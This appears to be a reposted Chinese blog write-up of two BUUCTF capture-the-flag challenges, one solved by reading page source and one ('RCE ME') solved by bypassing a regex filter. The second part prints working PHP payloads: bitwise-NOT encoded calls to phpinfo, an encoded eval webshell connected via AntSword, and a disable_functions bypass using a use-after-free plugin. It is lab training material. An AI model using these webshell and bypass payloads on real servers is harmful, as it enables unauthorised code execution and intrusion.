其他分享
首页 > 其他分享> > BUUCTF 36

BUUCTF 36

作者:互联网

知识点

  1. 语法:int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] )

  2. 参数:

  3. 作用:在  subject 字符串中搜索与 pattern给出的正则表达式相匹配的内容。

36-1 [BSidesCF 2019]Futurella

做题思路

 题目要我们阻止外星人,需要我们尝试读懂这个

查看了下源代码,成功找到flag

不太相信,尝试输入,卧槽,真的是这个

36-2 [极客大挑战 2019]RCE ME

做题思路

分析代码

查找php的信息

?code=(~%8F%97%8F%96%91%99%90)();

构造一个shell连上蚁剑
使用一句话木马

<?php 
error_reporting(0);

$a='assert';
$b=urlencode(~$a);
echo $b;

echo "<br>";
$c='(eval($_POST["test"]))';
$d=urlencode(~$c);
echo $d;

 ?>
?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%DD%8B%9A%8C%8B%DD%A2%D6%D6);

 image-20200503225207141

进入之后直接找根目录下的flag

image-20200503225318799

下面有两个文件,但是我们的shell不能执行命令

原因是我们之前查找phpinfo的时候,disable_functions 禁用了太多函数,我们需要绕开disable_functions

然后蚁剑有一个插件有这样的功能

image-20200503225927209

选择PHP_GC_UAF模式

image-20200503230032571

运行得到终端,运行/readflag获得Flag:

在这里插入图片描述

 

 

标签:code,8C%,int,36,BUUCTF,2019,9A%
来源: https://blog.csdn.net/qq_52431855/article/details/114310851